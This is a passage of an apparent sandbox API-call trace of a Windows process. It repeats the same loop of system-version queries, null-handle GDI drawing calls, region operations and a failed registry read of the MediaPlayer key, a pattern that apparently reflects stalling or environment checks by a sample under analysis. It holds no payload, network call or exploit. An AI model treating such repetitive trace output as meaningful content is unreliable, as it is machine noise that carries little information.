0x11056d1 [0089.651] DeleteObject (ho=0x11056d1) returned 1 [0089.651] DeleteObject (ho=0xbe0401dc) returned 1 [0089.651] DeleteObject (ho=0xc00401d9) returned 1 [0089.651] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.651] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.651] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.651] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.651] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.651] BeginPath (hdc=0x0) returned 0 [0089.651] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.651] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.651] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.651] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.651] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.651] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.651] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.651] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.651] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbf0401dc [0089.651] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc10401d9 [0089.651] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456d2 [0089.651] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456d3 [0089.651] CombineRgn (hrgnDst=0x10456d2, hrgnSrc1=0xbf0401dc, hrgnSrc2=0xc10401d9, iMode=1) returned 1 [0089.651] CombineRgn (hrgnDst=0x10456d3, hrgnSrc1=0xbf0401dc, hrgnSrc2=0xc10401d9, iMode=4) returned 2 [0089.651] CreateSolidBrush (color=0xff) returned 0x21056d1 [0089.651] CreateSolidBrush (color=0xff0000) returned 0x11056d4 [0089.651] DeleteObject (ho=0x11056d4) returned 1 [0089.651] DeleteObject (ho=0xc10401d9) returned 1 [0089.651] DeleteObject (ho=0xbf0401dc) returned 1 [0089.651] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.651] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.651] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.651] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.651] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.651] BeginPath (hdc=0x0) returned 0 [0089.652] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.652] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.652] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.652] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.652] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.652] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.652] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.652] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.652] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc20401d9 [0089.652] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc00401dc [0089.652] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456d5 [0089.652] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456d6 [0089.652] CombineRgn (hrgnDst=0x10456d5, hrgnSrc1=0xc20401d9, hrgnSrc2=0xc00401dc, iMode=1) returned 1 [0089.652] CombineRgn (hrgnDst=0x10456d6, hrgnSrc1=0xc20401d9, hrgnSrc2=0xc00401dc, iMode=4) returned 2 [0089.652] CreateSolidBrush (color=0xff) returned 0x21056d4 [0089.652] CreateSolidBrush (color=0xff0000) returned 0x11056d7 [0089.652] DeleteObject (ho=0x11056d7) returned 1 [0089.652] DeleteObject (ho=0xc00401dc) returned 1 [0089.652] DeleteObject (ho=0xc20401d9) returned 1 [0089.652] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.652] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.652] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.652] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.652] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.652] BeginPath (hdc=0x0) returned 0 [0089.652] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.652] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.652] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.652] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.652] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.652] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.652] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.652] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.652] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc10401dc [0089.652] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc30401d9 [0089.652] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456d8 [0089.652] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456d9 [0089.653] CombineRgn (hrgnDst=0x10456d8, hrgnSrc1=0xc10401dc, hrgnSrc2=0xc30401d9, iMode=1) returned 1 [0089.653] CombineRgn (hrgnDst=0x10456d9, hrgnSrc1=0xc10401dc, hrgnSrc2=0xc30401d9, iMode=4) returned 2 [0089.653] CreateSolidBrush (color=0xff) returned 0x21056d7 [0089.653] CreateSolidBrush (color=0xff0000) returned 0x11056da [0089.653] DeleteObject (ho=0x11056da) returned 1 [0089.653] DeleteObject (ho=0xc30401d9) returned 1 [0089.653] DeleteObject (ho=0xc10401dc) returned 1 [0089.653] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.653] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.653] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.653] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.653] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.653] BeginPath (hdc=0x0) returned 0 [0089.653] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.653] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.653] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.653] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.653] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.653] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.653] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.653] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.653] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc40401d9 [0089.653] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc20401dc [0089.653] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456db [0089.653] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456dc [0089.653] CombineRgn (hrgnDst=0x10456db, hrgnSrc1=0xc40401d9, hrgnSrc2=0xc20401dc, iMode=1) returned 1 [0089.653] CombineRgn (hrgnDst=0x10456dc, hrgnSrc1=0xc40401d9, hrgnSrc2=0xc20401dc, iMode=4) returned 2 [0089.653] CreateSolidBrush (color=0xff) returned 0x21056da [0089.653] CreateSolidBrush (color=0xff0000) returned 0x11056dd [0089.653] DeleteObject (ho=0x11056dd) returned 1 [0089.653] DeleteObject (ho=0xc20401dc) returned 1 [0089.654] DeleteObject (ho=0xc40401d9) returned 1 [0089.654] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.654] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.654] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.654] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.654] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.654] BeginPath (hdc=0x0) returned 0 [0089.654] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.654] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.654] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.654] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.654] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.654] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.654] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.654] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.654] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc30401dc [0089.654] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc50401d9 [0089.654] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456de [0089.654] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456df [0089.654] CombineRgn (hrgnDst=0x10456de, hrgnSrc1=0xc30401dc, hrgnSrc2=0xc50401d9, iMode=1) returned 1 [0089.654] CombineRgn (hrgnDst=0x10456df, hrgnSrc1=0xc30401dc, hrgnSrc2=0xc50401d9, iMode=4) returned 2 [0089.654] CreateSolidBrush (color=0xff) returned 0x21056dd [0089.654] CreateSolidBrush (color=0xff0000) returned 0x11056e0 [0089.654] DeleteObject (ho=0x11056e0) returned 1 [0089.654] DeleteObject (ho=0xc50401d9) returned 1 [0089.654] DeleteObject (ho=0xc30401dc) returned 1 [0089.654] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.654] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.655] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.655] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.655] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.655] BeginPath (hdc=0x0) returned 0 [0089.655] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.655] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.655] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.655] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.655] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.655] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.655] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.655] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.655] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc60401d9 [0089.655] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc40401dc [0089.655] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456e1 [0089.655] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456e2 [0089.655] CombineRgn (hrgnDst=0x10456e1, hrgnSrc1=0xc60401d9, hrgnSrc2=0xc40401dc, iMode=1) returned 1 [0089.655] CombineRgn (hrgnDst=0x10456e2, hrgnSrc1=0xc60401d9, hrgnSrc2=0xc40401dc, iMode=4) returned 2 [0089.655] CreateSolidBrush (color=0xff) returned 0x21056e0 [0089.655] CreateSolidBrush (color=0xff0000) returned 0x11056e3 [0089.655] DeleteObject (ho=0x11056e3) returned 1 [0089.655] DeleteObject (ho=0xc40401dc) returned 1 [0089.655] DeleteObject (ho=0xc60401d9) returned 1 [0089.655] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.655] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.655] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.655] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.656] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.656] BeginPath (hdc=0x0) returned 0 [0089.656] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.656] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.656] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.656] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.656] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.656] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.656] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.656] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.656] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc50401dc [0089.656] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc70401d9 [0089.656] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456e4 [0089.656] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456e5 [0089.656] CombineRgn (hrgnDst=0x10456e4, hrgnSrc1=0xc50401dc, hrgnSrc2=0xc70401d9, iMode=1) returned 1 [0089.656] CombineRgn (hrgnDst=0x10456e5, hrgnSrc1=0xc50401dc, hrgnSrc2=0xc70401d9, iMode=4) returned 2 [0089.656] CreateSolidBrush (color=0xff) returned 0x21056e3 [0089.656] CreateSolidBrush (color=0xff0000) returned 0x11056e6 [0089.656] DeleteObject (ho=0x11056e6) returned 1 [0089.656] DeleteObject (ho=0xc70401d9) returned 1 [0089.656] DeleteObject (ho=0xc50401dc) returned 1 [0089.656] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.656] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.656] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.656] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.656] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.656] BeginPath (hdc=0x0) returned 0 [0089.656] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.656] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.657] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.657] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.657] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.657] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.657] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.657] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.657] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc80401d9 [0089.657] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc60401dc [0089.657] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456e7 [0089.657] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456e8 [0089.657] CombineRgn (hrgnDst=0x10456e7, hrgnSrc1=0xc80401d9, hrgnSrc2=0xc60401dc, iMode=1) returned 1 [0089.657] CombineRgn (hrgnDst=0x10456e8, hrgnSrc1=0xc80401d9, hrgnSrc2=0xc60401dc, iMode=4) returned 2 [0089.657] CreateSolidBrush (color=0xff) returned 0x21056e6 [0089.657] CreateSolidBrush (color=0xff0000) returned 0x11056e9 [0089.657] DeleteObject (ho=0x11056e9) returned 1 [0089.657] DeleteObject (ho=0xc60401dc) returned 1 [0089.657] DeleteObject (ho=0xc80401d9) returned 1 [0089.657] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.657] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.657] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.657] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.657] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.657] BeginPath (hdc=0x0) returned 0 [0089.657] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.657] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.657] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.657] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.657] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.657] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.658] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.658] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.658] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc70401dc [0089.658] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc90401d9 [0089.658] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456ea [0089.658] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10456eb [0089.658] CombineRgn (hrgnDst=0x10456ea, hrgnSrc1=0xc70401dc, hrgnSrc2=0xc90401d9, iMode=1) returned 1 [0089.658] CombineRgn (hrgnDst=0x10456eb, hrgnSrc1=0xc70401dc, hrgnSrc2=0xc90401d9, iMode=4) returned 2 [0089.658] CreateSolidBrush (color=0xff) returned 0x21056e9 [0089.658] CreateSolidBrush (color=0xff0000) returned 0x11056ec [0089.658] DeleteObject (ho=0x11056ec) returned 1 [0089.658] DeleteObject (ho=0xc90401d9) returned 1 [0089.658] DeleteObject (ho=0xc70401dc) returned 1 [0089.658] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.658] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.658] BeginPaint (in: 